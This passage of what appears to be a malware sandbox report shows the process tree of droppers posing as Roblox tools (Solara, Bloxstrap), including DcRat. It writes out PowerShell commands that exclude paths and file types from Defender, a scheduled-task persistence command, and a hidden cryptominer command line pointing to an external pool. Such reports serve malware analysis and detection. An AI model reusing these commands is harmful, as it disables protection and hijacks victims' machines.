--embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
        6⤵
        
        PID:704
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2784 /prefetch:8
        6⤵
        
        PID:2240
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4580 /prefetch:8
        6⤵
        
        PID:5928
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=5108 /prefetch:8
        6⤵
        
        PID:5772
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4864 /prefetch:2
        6⤵
        
        PID:3488
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2032 /prefetch:8
        6⤵
        
        PID:11600
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4792 /prefetch:8
        6⤵
        
        PID:12868
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4680 /prefetch:8
        6⤵
        
        PID:17008
- - C:\Users\Admin\AppData\Local\Temp\solara.exe
    "C:\Users\Admin\AppData\Local\Temp\solara.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3488
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:704
      - C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
        
        "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\lsass.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\database\conhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\SolaraBootstrapper.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\sysmon.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Registry.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4912
        
        C:\Windows\Migration\SolaraBootstrapper.exe
        
        "C:\Windows\Migration\SolaraBootstrapper.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:1772
- C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1852
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
    3⤵
    PID:1096
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
      4⤵
      PID:5608
    - - C:\winNet\ComContainerbrowserRefRuntime.exe
        
        "C:\winNet/ComContainerbrowserRefRuntime.exe"
        5⤵
        Executes dropped EXE
        
        PID:4296
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qNlp31Qh95.bat"
        6⤵
        
        PID:1220
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3916
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:4424
        
        C:\Users\Default User\fontdrvhost.exe
        
        "C:\Users\Default User\fontdrvhost.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:5296
- C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
  2⤵
  - Executes dropped EXE
  PID:3560
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5476
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      PID:2324
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3540
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
      4⤵
      PID:3168
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
        5⤵
        DcRat
        Scheduled Task/Job: Scheduled Task
        
        PID:1472
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
      4⤵
      PID:5212
    - - C:\Users\Admin\Bloxstrap.exe
        
        C:\Users\Admin\Bloxstrap.exe
        5⤵
        Executes dropped EXE
        
        PID:4276
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:5944
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:1784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3544
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:1832
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:5820
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
        7⤵
        
        PID:5480
- C:\Users\Admin\AppData\Local\Temp\Frage build.exe
  "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3500
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
    3⤵
    PID:1972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
      4⤵
      PID:6004
    - - C:\DriversavessessionDlldhcp\Roblox.exe
        
        "C:\DriversavessessionDlldhcp/Roblox.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Modifies registry class
        
        PID:2072
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oza3vr0v\oza3vr0v.cmdline"
        6⤵
        Drops file in Windows directory
        
        PID:5980
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3563.tmp" "c:\Windows\security\database\CSCD83EB11C8955475DBA43DCED9A448C3C.TMP"
        7⤵
        
        PID:5856
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bmvwq502\bmvwq502.cmdline"
        6⤵
        
        PID:5660
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3709.tmp" "c:\winNet\CSCB7B2ADF66FCA4E8C9EE0DF1955445DDB.TMP"
        7⤵
        
        PID:3264
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f2brxcpv\f2brxcpv.cmdline"
        6⤵
        
        PID:5636
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37D4.tmp" "c:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\CSC63118D1DC1024AF1BF9977F545F46D39.TMP"
        7⤵
        
        PID:6008
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adbwbwp4\adbwbwp4.cmdline"
        6⤵
        
        PID:3088
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES389F.tmp" "c:\DriversavessessionDlldhcp\CSCAE70B349390D4DFDA770466575C77BFA.TMP"
        7⤵
        
        PID:1144
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vg04ngxu\vg04ngxu.cmdline"
        6⤵
        Drops file in Windows directory
        
        PID:3936
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES397A.tmp" "c:\Windows\Migration\CSCE7BCA4546D6B4965AD1BAE6EDF2479A7.TMP"
        7⤵
        
        PID:2016
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\myvoeldw\myvoeldw.cmdline"
        6⤵
        Drops file in Program Files directory
        
        PID:3124
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A45.tmp" "c:\Program Files\Windows Sidebar\Gadgets\CSC62A6B72159B7431CB23C13415B76C567.TMP"
        7⤵
        
        PID:4060
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rtn0fauv\rtn0fauv.cmdline"
        6⤵
        
        PID:6036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES467A.tmp" "c:\Program Files (x86)\Windows Photo Viewer\en-US\CSCF98217D13B1D4EAFB2FB8CD39131A9AC.TMP"
        7⤵
        
        PID:2784
